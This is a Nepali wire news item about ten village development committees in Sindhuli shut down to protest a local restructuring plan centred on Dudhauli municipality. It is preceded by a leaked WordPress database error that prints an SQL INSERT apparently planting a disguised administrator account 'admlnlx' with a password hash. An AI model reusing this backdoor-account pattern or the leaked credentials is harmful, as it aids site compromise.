WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMzMEECLm2za.7tmb7DfTc.9ItGvhb0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-01 12:44:05', '', 'admlnlx', 'admlnlx')
सिन्धुली,मंसिर १९–
यहाँका १० गाविस आजदेखि अनिश्चितकालका लागि बन्द गरिएको छ ।
स्थानीय तह पुनः संरचना प्राविधिक समितिले गरेको सिफारिसप्रति असन्तुष्टि जनाउँदै बन्द गरिएको हो । कमलाखोज क्षेत्रका १० गाविस हत्पते, सिर्थौली, हर्षाही, जिनाखु, अरुणठाकुर, ककुरठाकुर, साविक लदाभिर, टाडी र दुधौली (हाल दुधौली नगरपालिका) गाविस बन्दको आह्वान गरिएको छ ।
जिल्लास्तरीय पुनः संरचना प्राविधिक समितिले जनताको भावना विपरीत स्थानीय विकास अधिकारीको निवासमा बसेर स्थानीय तहको सिफारिस गर्दा आफूहरु समस्यामा परेको भन्दै आफूहरु आन्दोलनमा उत्रिन बाध्य भएको स्थानीयवासी मदन काफ्लेले बताउनुभयो ।
समितिले पुनः संरचना आयोगमा सिफारिस गर्दा हालको दुधौली नगरपालिकामा अन्य सात गाविस मिसाउँदै दुधौली नगरपालिका नामकरण गरेको र त्यसको सदरमुकाम दुधौलीलाई नै बनाएकोप्रति स्थानीयवासीले असन्तुष्टि व्यक्त गरेका छन् ।
उनीहरुले सात गाविस र दुधौली नगरपालिकाको बीच भागलाई केन्द्र बनाउनुपर्ने तथा नगरपालिकाको नाम भूगोलबाट राख्नुपर्ने माग गरेका छन् । -रासस